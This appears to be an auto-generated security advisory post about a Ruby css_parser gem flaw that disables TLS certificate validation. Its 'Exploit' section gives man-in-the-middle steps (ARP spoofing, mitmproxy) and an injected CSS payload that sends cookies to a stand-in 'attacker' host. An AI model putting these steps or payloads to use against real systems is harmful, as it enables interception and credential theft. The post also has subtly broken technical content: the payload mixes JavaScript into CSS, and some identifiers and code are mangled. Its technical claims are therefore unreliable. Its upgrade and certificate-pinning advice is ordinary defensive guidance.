Listen to this Post
How the CVE works (technical details):
The CSS Parser gem disables HTTPS certificate validation by setting `http.verify_mode = OpenSSL::SSL::VERIFY_NONE` in `lib/css_parser/parser.rb` (line 646). This means any SSL/TLS certificate, including self-signed, expired, or maliciously crafted, is accepted without checking authenticity or chain of trust. When an application uses this gem to fetch remote CSS over HTTPS, the underlying `Net::HTTP` client does not verify the server’s certificate. An attacker in a Man-in-the-Middle position (e.g., on the same network or controlling a rogue access point) can intercept the HTTPS request. The attacker presents a fraudulent certificate, which the client blindly trusts. The attacker then modifies the CSS response body—injecting malicious rules, overriding existing styles, or exfiltrating data via CSS selectors. The modified CSS is parsed and used by the application as if legitimate. No error or warning is raised because `VERIFY_NONE` suppresses all certificate validation failures. This effectively downgrades HTTPS to plain HTTP in terms of security, breaking the confidentiality and integrity guarantees of TLS. The vulnerability exists in all versions before the patch. The issue is triggered whenever `CssParser::Parserload_uri!` or similar methods fetch a https://` URL. The attack requires no user interaction and succeeds silently.
<h2 style="color: blue;">dailycve form:</h2>
Platform: Ruby css_parser
Version: Up to 1.7.0
Vulnerability: MITM CSS injection
Severity: Medium
Date: 2023-03-24
<h2 style="color: blue;">Prediction: Patched in 1.7.1</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Check for vulnerable verify_mode setting
grep -n "VERIFY_NONE" $(bundle show css_parser)/lib/css_parser/parser.rb
Test with curl using a malicious proxy
curl -x http://malicious-proxy:8080 --proxy-cacert fake.pem \
https://example.com/style.css -v
Ruby one-liner to simulate disabled verification
ruby -rnet/http -ropenssl -e '
http = Net::HTTP.new("example.com", 443)
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
puts http.get("/style.css").body
'
<h2 style="color: blue;">Exploit:</h2>
1. Position attacker on network between target and CSS server (ARP spoofing, rogue Wi-Fi).
2. Run mitmproxy with `--set ssl_insecure=true` to intercept HTTPS.
3. When target Ruby app loadshttps://trusted-cdn.com/theme.css`, proxy intercepts request.
4. Inject malicious CSS: `body{background:url(‘http://attacker/steal?cookie=’+document.cookie)}`
5. Vulnerable gem accepts self-signed proxy certificate and returns injected CSS.
6. App renders/modifies pages using attacker-controlled styles.
Protection from this CVE
- Upgrade to css_parser >= 1.7.1 (which sets
VERIFY_PEER). - Manually override verify_mode: `http.verify_mode = OpenSSL::SSL::VERIFY_PEER` in custom wrappers.
- Use `CssParser::Parserload_uri!` only with local or pinned HTTPS certificates.
- Implement certificate pinning or use a secure HTTP client (e.g., `Faraday` with strict SSL).
Impact
- Arbitrary CSS injection into application’s rendered output.
- Defacement, phishing overlays, or extraction of sensitive data via CSS `url()` and
@import. - Bypass of HTTPS integrity and confidentiality for all remote stylesheets.
- Silent MITM attacks with no logging or error indication.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
